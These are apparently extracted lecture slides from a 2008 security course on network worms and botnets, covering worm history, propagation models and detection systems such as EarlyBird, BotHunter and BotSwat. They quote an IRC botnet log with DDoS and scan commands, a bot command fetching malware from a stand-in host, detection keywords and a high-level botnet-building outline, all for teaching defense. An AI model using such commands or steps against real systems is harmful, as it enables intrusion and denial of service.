Spring 2008 CS 155 Network Worms and Bots John Mitchell Outline Worms Worm examples and propagation methods Detection methods Traffic patterns: EarlyBird Vulnerabilities: Generic Exploit Blocking Disabling.
Download ReportTranscript Spring 2008 CS 155 Network Worms and Bots John Mitchell Outline Worms Worm examples and propagation methods Detection methods Traffic patterns: EarlyBird Vulnerabilities: Generic Exploit Blocking Disabling.
CS 155
Network Worms and Bots
John Mitchell Spring 2008
2
Outline
Worms Worm examples and propagation methods Detection methods Traffic patterns: EarlyBird Vulnerabilities: Generic Exploit Blocking Disabling worms Generate signatures for network or host-based filters Bots Structure and use of bots Recognizing bot propagation Recognizing bot operation Network-based methods Host-based methods
3
Worm
A worm is self-replicating software designed to spread through the network Typically, exploit security flaws in widely used services Can cause enormous damage Launch DDOS attacks, install bot networks Access sensitive information Cause confusion by corrupting the sensitive information Worm vs Virus vs Trojan horse A virus is code embedded in a file or program Viruses and Trojan horses rely on human intervention Worms are self-contained and may spread autonomously
4
Cost of worm attacks Morris worm, 1988
Infected approximately 6,000 machines 10% of computers connected to the Internet cost ~ $10 million in downtime and cleanup
Code Red worm, July 16 2001
Direct descendant of Morris’ worm Infected more than 500,000 servers Programmed to go into infinite sleep mode July 28 Caused ~ $2.6 Billion in damages,
Love Bug worm: $8.75 billion
Statistics: Computer Economics Inc., Carlsbad, California
5
Internet Worm (First major attack) Released November 1988
Program spread through Digital, Sun workstations Exploited Unix security vulnerabilities VAX computers and SUN-3 workstations running versions 4.2 and 4.3 Berkeley UNIX code
Consequences
No immediate damage from program itself Replication and threat of damage Load on network, systems used in attack Many systems shut down to prevent further attack
6
Some historical worms of note
Worm
Morris ADM Ramen Lion Cheese Code Red Walk Nimda Scalper Slammer
Date Distinction
11/88 Used multiple vulnerabilities, propagate to “nearby” sys 5/98 1/01 Random scanning of IP address space Exploited three vulnerabilities 3/01 6/01 7/01 8/01 9/01 6/02 1/03 Stealthy, rootkit worm Vigilante worm that secured vulnerable systems First sig Windows worm; Completely memory resident Recompiled source code locally Windows worm: client-to-server, c-to-c, s-to-s, … 11 days after announcement of vulnerability; peer-to peer network of compromised systems Used a single UDP packet for explosive growth Kienzle and Elder
7
Increasing propagation speed
Code Red, July 2001 Affects Microsoft Index Server 2.0, Windows 2000 Indexing service on Windows NT 4.0.
Windows 2000 that run IIS 4.0 and 5.0 Web servers Exploits known buffer overflow in Idq.dll
Vulnerable population (360,000 servers) infected in 14 hours SQL Slammer, January 2003 Affects in Microsoft SQL 2000 Exploits known buffer overflow vulnerability Server Resolution service vulnerability reported June 2002 Patched released in July 2002 Bulletin MS02-39 Vulnerable population infected in less than 10 minutes
8
Code Red Initial version released July 13, 2001
Sends its code as an HTTP request HTTP request exploits buffer overflow Malicious code is not stored in a file Placed in memory and then run
When executed,
Worm checks for the file C:\Notworm If file exists, the worm thread goes into infinite sleep state Creates new threads If the date is before the 20th of the month, the next 99 threads attempt to exploit more computers by targeting random IP addresses
9
Code Red of July 13 and July 19
Initial release of July 13 1 st through 20 th month: Spread via random scan of 32-bit IP addr space 20 th through end of each month: attack.
Flooding attack against 198.137.240.91 (
www.whitehouse.gov)
Failure to seed random number generator
linear growth
Revision released July 19, 2001.
White House responds to threat of flooding attack by changing the address of
www.whitehouse.gov
Causes Code Red to die for date ≥ 20 th of the month.
But: this time random number generator correctly seeded Slides: Vern Paxson
10 Slide: Vern Paxson
Measuring activity: network telescope
11 Monitor cross-section of Internet address space, measure traffic “Backscatter” from DOS floods Attackers probing blindly Random scanning from worms LBNL’s cross-section: 1/32,768 of Internet UCSD, UWisc’s cross-section: 1/256 .
12
Spread of Code Red
Network telescopes estimate of # infected hosts: 360K. (Beware DHCP & NAT) Course of infection fits classic
logistic
.
Note: larger the vulnerable population,
faster
worm spreads.
the That night ( 20 th ), worm dies … … except for hosts with inaccurate clocks!
It just takes one of these to restart the worm on August 1 st … Slides: Vern Paxson
13 Slides: Vern Paxson
14
Code Red 2
Released August 4, 2001.
Comment in code: “Code Red 2.” But in fact completely different code base.
Payload: a root backdoor, resilient to reboots.
Bug: crashes NT , only works on Windows 2000.
Localized scanning
: prefers nearby addresses.
Kills Code Red 1.
Safety valve: programmed to die Oct 1, 2001.
Slides: Vern Paxson
15
Striving for Greater Virulence: Nimda Released September 18, 2001.
Multi-mode spreading:
attack IIS servers via infected clients email itself to address book as a virus copy itself across open network shares modifying Web pages on infected servers w/ client exploit scanning for Code Red II backdoors (!)
worms form an ecosystem!
Leaped across firewalls.
Slides: Vern Paxson
16 CR 1 returns thanks to bad clocks Code Red 2 kills off Code Red 1 Code Red 2 settles into weekly pattern Nimda enters the ecosystem Code Red 2 dies off as programmed Slides: Vern Paxson
17
How do worms propagate?
Scanning worms Worm chooses “random” address Coordinated scanning Different worm instances scan different addresses Flash worms Assemble tree of vulnerable hosts in advance, propagate along tree Not observed in the wild, yet Potential for 106 hosts in < 2 sec ! [Staniford] Meta-server worm Ask server for hosts to infect (e.g., Google for “powered by phpbb”) Topological worm: Use information from infected hosts (web server logs, email address books, config files, SSH “known hosts”) Contagion worm Propagate parasitically along with normally initiated communication
18
How fast are scanning worms?
Model propagation as infectious epidemic
Simplest version: Homogeneous random contacts N: population size S(t): susceptible hosts at time t I(t): infected hosts at time t ß: contact rate i(t): I(t)/N, s(t): S(t)/N
dI dt dS dt
IS
N IS N di dt
i
( 1
i
) courtesy Paxson, Staniford, Weaver
i
(
t
) 1
e
(
t
T
)
e
(
t
T
)
19
Shortcomings of simplified model Prediction is faster than observed propagation Possible reasons
Model ignores infection time, network delays Ignores reduction in vulnerable hosts by patching
Model supports unrealistic conclusions
Example: When the Top-100 ISP’s deploy containment strategies, they still can not prevent a worm spreading at 100 probes/sec from affecting 18% of the internet, no matter what the reaction time of the system towards containment
20
Analytical Active Worm Propagation Model
[Chen et al., Infocom 2003] More detailed discrete time model Assume infection propagates in one time step Notation N – number of vulnerable machines h – “hitlist: number of infected hosts at start s – scanning rate: # of machines scanned per infection d – death rate: infections detected and eliminated p – patching rate: vulnerable machines become invulnerable At time i, n i are infected and m i are vulnerable Discrete time difference equation Guess random IP addr, so infection probability (m i -n i )/2 32 Number infected reduced by pn i + dn i
Effect of parameters on propagation
2. Patching Rate 1.
HitList Size 3.Time to Complete Infection
(Plots are for 1M vulnerable machines, 100 scans/sec, death rate 0.001/second 21 Other models: Wang et al, Modeling Timing Parameters … Ganesh et al, , WORM ’04 (includes delay) The Effect of Network Topology … , Infocom 2005 (topology)
22
Worm Detection and Defense
Detect via
honeyfarms
: collections of “honeypots” fed by a network telescope.
Any outbound connection from honeyfarm = worm.
(at least, that’s the theory) Distill
signature
from inbound/outbound traffic.
If telescope covers N addresses, expect detection when worm has infected 1/N of population.
Thwart via
scan suppressors
: network elements that block traffic from hosts that make failed connection attempts to too many other hosts 5 minutes to several weeks to write a signature Several hours or more for testing
23
Need for automation
Current threats can spread faster than defenses can reaction Manual capture/analyze/signature/rollout model too slow
months days hrs mins secs Program Viruses Pre automation Macro Viruses Contagion Period Signature Response Period E-mail Worms Network Worms Post automation Flash Worms 1990
Time
2005
Slide: Carey Nachenberg, Symantec
24
Signature inference
Challenge need to automatically learn a content “signature” for each new worm – potentially in less than a second!
Some proposed solutions Singh et al, Automated Worm Fingerprinting, OSDI ’04 Kim et al, Autograph: Toward Automated, Distributed Worm Signature Detection, USENIX Sec ‘04
25
Signature inference Monitor network and look for strings common to traffic with worm-like behavior
Signatures can then be used for content filtering Slide: S Savage
26
Content sifting
Assume there exists some (relatively) unique invariant bitstring W across all instances of a particular worm ( true today, not tomorrow...
) Two consequences Content Prevalence: W will be more common in traffic than other bitstrings of the same length Address Dispersion: the set of packets containing address a disproportionate number of distinct sources and destinations W will Content sifting : find W ’s with high content prevalence and high address dispersion and drop that traffic Slide: S Savage
Observation: High-prevalence strings are rare
1 0.998
0.996
0.994
0.992
0.99
0.988
0.986
0.984
1 10 100 1000 10000 100000
Only 0.6%
of the 40 byte
substrings repeat more than 3 times
in a minute
Number of repeats
The basic algorithm
Detector in network
A E Prevalence
Table
B
cnn.com
C D
Address
Dispersion
Table Sources Destinations
The basic algorithm
Detector in network
A E Prevalence
Table
1 B
cnn.com
C D
Address
Dispersion
Table Sources Destinations
1 (A) 1 (B)
The basic algorithm
Detector in network
A E Prevalence
Table
1 1 B
cnn.com
C D
Address
Dispersion
Table Sources Destinations
1 (A) 1 (C) 1 (B) 1 (A)
The basic algorithm
Detector in network
A E Prevalence
Table
2 1 B
cnn.com
C D
Address
Dispersion
Table Sources Destinations
2 (A,B) 1 (C) 2 (B,D) 1 (A)
The basic algorithm
Detector in network
A E Prevalence
Table
3 1 B
cnn.com
C D
Address
Dispersion
Table Sources Destinations
3 (A,B,D) 3 (B,D,E) 1 (C) 1 (A)
Challenges
Computation To support a 1Gbps line rate we have 12us to process each packet, at 10Gbps 1.2us, at 40Gbps… Dominated by memory references; state expensive Content sifting requires looking at every byte in a packet State On a fully-loaded 1Gbps link a naïve implementation can easily consume 100MB/sec for table Computation/memory duality: on high-speed (ASIC) implementation, latency requirements may limit state to on-chip SRAM
Which substrings to index?
Approach 1: Index all substrings
Way too many substrings state too much computation too much
Approach 2: Index whole packet
Very fast but trivially evadable (e.g., Witty, Email Viruses)
Approach 3: Index all contiguous substrings of a fixed length ‘S’
Can capture all signatures of length ‘S’ and larger
A B C D E F G H I J K
P1 P2
How to represent substrings?
Store hash instead of literal to reduce state Incremental hash to reduce computation Rabin fingerprint is one such efficient incremental hash function [Rabin81,Manber94] One multiplication, addition and mask per byte
R A N D A B C D O M
Fingerprint = 11000000
R A B C D A N D O M
Fingerprint = 11000000
How to subsample?
Approach 1: sample packets
If we chose 1 in N, detection will be slowed by N
Approach 2: sample at particular byte offsets
Susceptible to simple evasion attacks No guarantee that we will sample same sub-string in every packet
Approach 3: sample based on the hash of the substring
Finding “heavy hitters” via Multistage Filters Hash 1 Increment Counters Hash 2 Comparator Stage 1 Field Extraction Stage 2 Comparator Hash 3 Stage 3 Comparator ALERT !
If all counters above threshold
Multistage filters in action
Counters . . .
Grey = other hahes Yellow = rare hash Green = common hash
Threshold
Stage 1 Stage 2 Stage 3
Observation: High address dispersion is rare too
Naïve implementation might maintain a list of sources (or destinations) for each string hash But dispersion only matters if its over Approximate counting may suffice threshold
Trades accuracy for state in data structure Scalable Bitmap Counters
Similar to multi-resolution bitmaps [Estan03] Reduce memory by 5x for modest accuracy error
Scalable Bitmap Counters
1 1 Hash(Source)
Hash : based on Source (or Destination) Sample : keep only a sample of the bitmap Estimate : scale up sampled count Adapt : periodically increase scaling factor Error Factor = 2/(2
numBitmaps
-1) With 3, 32-bit bitmaps, error factor = 28.5%
Content sifting summary Index fixed-length substrings using incremental hashes Subsample hashes as function of hash value Multi-stage filters to filter out uncommon strings Scalable bitmaps to tell if number of distinct addresses per hash crosses threshold This is fast enough to implement
Experience
Quite good.
Detected and automatically generated signatures for every known worm outbreak over eight months Can produce a precise signature for a new worm in a fraction of a second Software implementation keeps up with 200Mbps Known worms detected: Code Red, Nimda, WebDav, Slammer, Opaserv, … Unknown worms (with no public signatures) detected: MsBlaster, Bagle, Sasser, Kibvu, …
False Positives
Common protocol headers
Mainly HTTP and SMTP headers Distributed (P2P) system protocol headers
Procedural whitelist
Small number of popular protocols
Non-worm epidemic Activity
SPAM
BitTorrent GNUTELLA.CONNECT
/0.6..X-Max-TTL: .3..X-Dynamic-Qu erying:.0.1..X-V ersion:.4.0.4..X
-Query-Routing:.
0.1..User-Agent: .LimeWire/4.0.6.
.Vendor-Message: .0.1..X-Ultrapee r-Query-Routing:
44
Generic Exploit Blocking
Idea Write a network IPS signature to generically detect and block all future attacks on a vulnerability Different from writing a signature for a specific exploit!
Step #1: Characterize the vulnerability “shape” Identify fields, services or protocol states that must be present in attack traffic to exploit the vulnerability Identify data footprint size required to exploit the vulnerability Identify locality of data footprint; will it be localized or spread across the flow?
Step #2: Write a generic signature that can detect data that “mates” with the vulnerability shape Similar to Shield research from Microsoft Slide: Carey Nachenberg, Symantec
45
Generic Exploit Blocking Example #1
Consider MS02-039 Vulnerability (SQL Buffer Overflow): Field/service/protocol UDP port 1434 Packet type: 4 Minimum data footprint Packet size > 60 bytes Data Localization Limited to a single packet
BEGIN END
} { Pseudo-signature:
NAME: MS SQL Vuln
if (packet.port() == 1434 &&
TRIGGER: ANY:ANY->ANY:1434
packet.size() > 60) report_exploit(MS02-039);
Slide: Carey Nachenberg, Symantec
Generic Exploit Blocking Example #2
46 Consider MS03-026 Vulnerability (RPC Buffer Overflow): Field/service/protocol RPC request on TCP/UDP 135 szName field in CoGetInstanceFromFile func.
Minimum data footprint Arguments > 62 bytes Data Localization Limited to 256 bytes from start of RPC bind command
BEGIN
} {
END
Sample signature:
NAME: RPC Vulnerability TRANSIT-TYPE: TCP, UDP
if (port == 135 && type == request && func == parameters.length() > 62)
\x00\x00.*\x05\x00
report_exploit(MS03-026);
CoGetInstanceFromFile && Slide: Carey Nachenberg, Symantec
47
Worm summary Worm attacks
Many ways for worms to propagate Propagation time is increasing Polymorphic worms, other barriers to detection
Detect
Traffic patterns: EarlyBird Watch attack: TaintCheck and Sting Look at vulnerabilities: Generic Exploit Blocking
Disable
Generate worm signatures and use in network or host-based filters
48
Botnet Collection of compromised hosts
Spread like worms and viruses Once installed, respond to remote commands
Platform for many attacks
Spam forwarding (70% of all spam?) Click fraud Keystroke logging Distributed denial of service attacks
Serious problem
Top concern of banks, online merchants Vint Cerf: ¼ of hosts connected to Internet
What are botnets used for?
49
capability create port redirect other proxy download file from web DNS resolution UDP/ping floods other DDoS floods scan/spread spam visit URL ago √ √ √ √ √ √ √ √ √ DSNX √ √ √ evil √ G-SyS √ √ √ √ √ √ √ sd √ Spy √ √ √ √ √ √ √ √ √
Capabilities are exercised via remote commands.
50
Building a Bot Network
compromise attempt Win XP Attacker compromise attempt compromise attempt compromise attempt FreeBSD Mac OS X Win XP
51
Building a Bot Network
Attacker compromise attempt install bot software compromise attempt compromise attempt Win XP compromised FreeBSD Mac OS X compromise attempt install bot software Win XP compromised
52
Step 2
Win XP . . .
/connect jade.va.us.dal.net
/join #hacker . . .
Win XP . . .
/connect jade.va.us.dal.net
/join #hacker . . .
Win XP . . .
/connect jade.va.us.dal.net
/join #hacker . . .
jade.va.dal.net
53
Step 3
(12:59:27pm) -- A9-pcgbdv ([email protected]) has joined (#owned) Users : 1646
(12:59:27pm) (@PhaTTy) .ddos.synflood 216.209.82.62
(12:59:27pm) -- A6-bpxufrd (A6-bpxufrd@wp95 81.introweb.nl) has joined (#owned) Users : 1647 (12:59:27pm) -- A9-nzmpah ([email protected]) has left IRC (Connection reset by peer)
(12:59:28pm) (@PhaTTy) .scan.enable DCOM
(12:59:28pm) -- A9-tzrkeasv ([email protected]) has joined (#owned) Users : 1650
54 • • • • • Spam service Rent-a-bot Cash-out Pump and dump Botnet rental 5
55
Underground commerce
Market in access to bots Botherd: Collects and manages bots Access to proxies (“peas”) sold to spammers, often with commercial-looking web interface Sample rates Non-exclusive access to botnet: 10¢ per machine Exclusive access: 25¢.
Payment via compromised account (eg PayPal) or cash to dropbox Identity Theft Keystroke logging Complete identities available for $25 - $200+ Rates depend on financial situation of compromised person Include all info from PC files, plus all websites of interest with passwords/account info used by PC owner At $200+, usually includes full credit report [Lloyd Taylor, Keynote Systems, SFBay InfraGard Board ]
56
Sobig.a In Action Arrives as an email attachment
Written in C++ Encrypted with Telock to slow analysis
User opens attachment, launching trojan
Downloads file from a free Geocities account Contains list of URLs pointing to second stage
Fetches second-stage trojan
Arbitrary executable file – could be anything For Sobig.a, second-stage trojan is Lala
57
Stage 2 – Lala Communication
Lala notifies a cgi script on a compromised host Different versions of Lala have different sites and cgi scripts, perhaps indicating tracking by author
Installation
Lala installs a keylogger and password-protected Lithium remote access trojan.
Lala downloads Stage 3 trojan Wingate proxy (commercial software)
Cleanup
Lala removes the Sobig.a trojan
58
Stage 3 – Wingate
Wingate is a general-purpose port proxy server 555/TCP – RTSP 608/TCP – Remote Control Service 1180/TCP – SOCKS 1181/TCP – Telnet Proxy 1182/TCP – WWW Proxy 1183/TCP – FTP Proxy 1184/TCP – POP3 Proxy 1185/TCP – SMTP Server Final state of compromised machine Complete remote control by Lithium client with password “adm123” Complete logging of user’s keystrokes Usable for spam relay, http redirects Wingate Gatekeeper client can connect to 608/TCP, can log/change everything
59
Build Your Own Botnet
Pick a vector mechanism IRC Channels: DCC Filesends, Website Adverts to Exploit Sites Scan & Sploit: MSBlast Trojan: SoBig/BugBear/ActiveX Exploits Choose a Payload Backdoors Agobot, SubSeven, DeepThroat Most include mechanisms for DDoS, Self-spreading, download/exec arbitrary code, password stealers.
Do it Compromise an IRC server, or use your own zombied machines Configure Payload to connect to selected server Load encryption keys and codes Release through appropriate compromised systems Sit back and wait, or start on your next Botnet [Lloyd Taylor, Keynote Systems, SFBay InfraGard Board ]
60
Bot detection methods
Signature-based (most AV products) Rule-based Monitor outbound network connections (e.g. ZoneAlarm, BINDER) Block certain ports (25, 6667, ...) Hybrid: content-based filtering Match network packet contents to known command strings (keywords) E.g. Gaobot ddos cmds: .ddos.httpflood
Network traffic monitoring Wenke Lee, Phil Porras: Bot Hunter, … Correlate various NIDS alarms to identify “bot infection sequence” GA Tech: Recognize traffic patterns associated with ddns-based rallying Stuart Staniford, FireEye Detect port scanning to identify suspicious traffic Emulate host with taint tracking to identify exploit
A Cyber-TA Distributed Correlation Example –
Introduction Approaches to Privacy-Preserving Correlation
botHunter What is botHunter?
A Real Case Study Behavior-based Correlation Architectural Overview botHunter Sensors Correlation Framework Example botHunter Output Cyber-TA Integration
BotHunter: passive bot detection
Snort-based sensor suite for malware event detection inbound scan detection remote to local exploit detection anomaly detection system for exploits over key TCP protocols Botnet specific egg download banners, Victim-to-C&C-based communications exchanges particularly for IRC bot protocols Event correlator combines information from sensors to recognize bots that infect and coordinate with your internal network assets Submits “bot-detection profiles” to the Cyber-TA repository infrastructure 61
A-2-V
E2: Inbound Infection
V-2-A
E3: Egg Download E1: Inbound Scan
A-2-V
E5: Outbound Scan E4: C&C Comms
V-2-C
62 • Search for duplex communication sequences that are indicative of infection-coordination-infection lifecycle
A Cyber-TA Distributed Correlation Example –
Introduction Approaches to Privacy-Preserving Correlation
botHunter
What is botHunter?
A Real Case Study
Behavior-based Correlation Architectural Overview
Phatbot infection lifecycle
botHunter Sensors Correlation Framework Example botHunter Output Cyber-TA Integration 63 A: Attack, V: Victim, C: C&C Server E1: A.* V.{2745, 135, 1025, 445, 3127, 6129, 139, 5000} (Bagle, DCOM2, DCOM, NETBIOS, DOOM, DW, NETBIOS, UPNP…TCP connections w/out content transfers) E2: A.* V.135
(Windows DCE RCP exploit in payload) E3: V.* A.31373
(transfer a relatively large file via random A port specified by exploit) E4: V.* C.6668
(connect to an IRC server) E5: V.* V‘.{2745, 135, 1025, 445, 3127, 6129, 139, 5000} (V begins search for new infection targets, listens on 11759 for future egg downloads)
captured in a controlled VMWare environment
What is botHunter?
A Real Case Study Behavior-based Correlation
Architectural Overview Botnets: Architecture Overview
botHunter Sensors Correlation Framework Example botHunter Output Cyber-TA Integration
BotHunter System Architecture
Span Port to Ethernet Device Snort 2.6.0
spp_scade.c|h SLADE spp_scade.c|h SCADE Signature Engine botHunter Ruleset e2: Payload Anomalies e1: Inbound Malware Scans e5: Outbound Scans e2: Exploits e3: Egg Downloads e4: C&C Traffic bothunter.config
bothunter.XML
C T A P T A S R N S O E R R CTA Anonymizer Plugin botHunter
Correlator Java 1.4.2
bot Infection Profile:
• Confidence Score • Victim IP • Attacker IP List (by confidence) • Coordination Center IP (by confidence) • Full Evidence Trail: Sigs, Scores, Ports • Infection Time Range 64 Snort +2.6.0, OS: Linux, MacOS, Win, FreeBSD, Solaris, Java +1.4.2
65 What is botHunter?
A Real Case Study Behavior-based Correlation Architectural Overview
botHunter Signature Set
botHunter Sensors
Correlation Framework Example botHunter Output Cyber-TA Integration Replace standard snort rules Five custom rulesets: e[1-5].rules
Scope known worm/bot exploit general traffic signatures, shell/code/script exploits, update/download/registered rules, C&C command exchanges, outbound scans, malware exploits Rule sources Bleeding Edge malware rulesets Snort Community Rules, Snort Registered Free Set Cyber-TA Custom bot-specific rules Current Set: 237 rules, operating on SRI/CSL and GA Tech networks, relative low false positive rate
66
Detection
What is botHunter?
A Real Case Study Behavior-based Correlation Architectural Overview botHunter Sensors
Correlation Framework
Example botHunter Output Cyber-TA Integration
- Correlation Framework Bot-State Correlation Data Structure VictimIP E1 E2 E3 E4 E5 Score Characteristics of Bot Declarations
•states are triggered in any order, but pruning timer reinitializes row state once an InitTime Trigger is activated • external stimulus alone cannot trigger bot alert • 2 x internal bot behavior triggers bot alert • When bot alert is declared, IP addresses are assigned responsibility based on raw contribution Rows: Valid Internal Home_Net IP Colums: Bot infection stages Entry: IP addresses that contributed alerts to E-Column Score Column: Cumulative score for per Row Threshold – ( row_score > threshold) declare bot InitTime Triggers – An event that initiate pruning timer Pruning Timer – Seconds remaining until a row is reinitialized
Defaults:
E1 – Inbound scan detected weight = .25
E2 E3 E4 E5 – Inbound exploit detected weight = .25
– Egg download detected weight = .50
– C&C channel detected weight = .50
– Outbound scan detected weight = .50
Threshold = 1.0
Pruning Interval = 120 seconds
67
Botnets network traffic patterns
Unique characteristic: “rallying” Bots spread like worms and trojans Payloads may be common backdoors Centralized control of botnet is characteristic feature Georgia Tech idea: DNS Bots installed at network edge IP addresses may vary, use Dynamic DNS Bots talk to controller, make DDNS lookup Pattern of DDNS lookup is easy to spot for common botnets!
David Dagon, Sanjeev Dwivedi, Robert Edmonds, Julian Grizzard, Wenke Lee, Richard Lipton, Merrick Furst; Cliff Zou (U Mass)
68 68
69 69
70
BotSwat Host-based bot detection Based on idea of remote control commands
71
What does remote control look like?
http.execute
Invoke system calls: connect, network send and recv, create file, write file, … On arguments received over the network: IP to connect to, object to request, file name, … Botswat premise We can distinguish the behavior of bots from that of innocuous processes via detecting “remote control” We can approximate “remote control” as “using data received over the network in a system call argument”
72
http.execute www.badguy.com/malware.exe C:\WIN\bad.exe
agobot
3 4
connect (…, www.badguy.com
,…)
5
send ( …,“… GET /malware.exe
…”,…)
7
fcreate (…,“ C:\WIN\malware.exe
”,…)
8 1 Windows XP NIC 2 6
S O U R C E S ?
?
BotSwat
?
S I N K S 73
bind(…) CreateProcessA(…) NtCreateFile(…)
?
...
BotSwat architecture: overview
74
Interposition mechanism ( detours )
Interposes on API calls
Tainting module
Instantiates and propagates taint
User-input module
Tracks local user input as received via KB or mouse (“clean” data); propagates cleanliness
Behavior checking
Monitors invocations of selected system calls Queries tainting and user-input modules Determines whether to flag invocation
~70k lines C++ and ~2200 intercepted fxns
75
Library-call level tainting
Intercept calls made by process via a DLL to memory-copying functions If C library functions statically linked in (STAT), we won’t see run time calls to these functions Handling visibility limitations Taint a mem region on basis of its contents Keep track of data received over the network Taint propagation modes: Cause-and-Effect (C&E) – conservative Correlative (CORR) – liberal
76
User input tracking
Goal: Identify actions initiated by local app user Challenge: data value associated with mouse input
heavily application-defined
API call or similar ; not exposed via Solution: consider all data values referred to by app while it is handling mouse input event (an over-approximation)
clean
Figure out when app handling input event
System creates message M
MainWndProc(…, UINT uMsg,…){ switch (uMsg) { case WM_LBUTTONDOWN: ...
... } ...
77 App executes code to handle event
DispatchMessage(...)
Target Window: W Input Type: LMB click Location:
GetMessage(...)
M1 M2 M3
78
Behaviors and gates
NtOpenFile tainted open file tainted create file tainted prog exec ...
bind tainted IP bind tainted port ...
tainted send derived send sendto tainted IP sendto tainted port NtCreateFile MoveFile{Ex}{A,W} Win32DeleteFile MoveFileWithProgress{Ex}{A,W} DeleteFile{A,W} ReplaceFile{A,W} CreateFile{A,W}, OpenFile, CopyFile{Ex}{A,W}, fopen, _open, _lopen, _lcreat, ...
NtDeviceIoControlFile
…
bind, send, sendto, WSASend, WSASendTo, SSL_write, …
Selection of behaviors/gates/sinks: informed by bot capabilities
79
Evaluation of BotSwat
Bots: ago, DSNX, evil, G-SyS, sd, Spy Two test scenarios C library functions dynamically or statically linked Many bot variants Apply xforms (compr, encr) to bot binary Minor source edits (C&C params, config data) Variants from ago, sd, & Spy families: 98.2% of all bots seen in wild (’05) Eight benign programs web browser; clients: email, ftp, ssh, chat, AV signature updater; IRC server Chosen as likely to exhibit behavior similar to bots
80
Results – overview Detected execution of most candidate cmds Detected vast majority of bots’ remote control behavior – even when couldn’t see bots’ calls to memory-copying functions
# behaviors exhibited: # behavs detected (DYN, C&E): 207 196 # behavs detected (STAT, CORR): 148
Tested 8 benign progs; not many FPs
Under CORR: 8 behaviors; 5 different
81
Detected commands
capability port redirect other proxy web download DNS resolution UDP/ping floods oth DDoS floods scan/spread spam visit URL ago DSNX evil G-SyS sd √ √ √ √ √ √ √ √ √ √ √ √ √ √ √ √ √ √ √ √ √ √ √ √ √ √ Spy √ √ √ √
capability kill process open/exec file keylogging create dir delete file/dir list dir move file/dir DCC send file act as http svr change C&C svr create clone clone attacks
82
create spy ago DSNX evil G-SyS sd √ √ √ √ √ √ √ √ √ √ √ √ √ √ √ √ √ √ √ √ Spy √ √ √ √ √ √ √ √ √ √
Spybot (DYN, C&E)
execute
83
scan
84
Botswat – summary
Proof of concept Single behavior – remote control – detects most malicious bot actions Resilient to differences that distinguish variants (and even families) Works against bots not used in design of method Independent of command and control protocol, botnet structure Low false positive rate; can handle with whitelist or other methods Significant limitations Interposition at library call level Some bots in wild may allow only low-level system call tracking Need to decide when to raise an alarm Correlate low-level system events to identify high-level bot commands Experiment with alarm thresholds Develop malware analysis tool to produce characterization of bot actions Instruction-level tainting for developing malspecs, evaluating detection results Efficient run-time monitor of selected applications in production environment Which processes should be monitored?
How to collect, aggregate, process, and report information efficiently?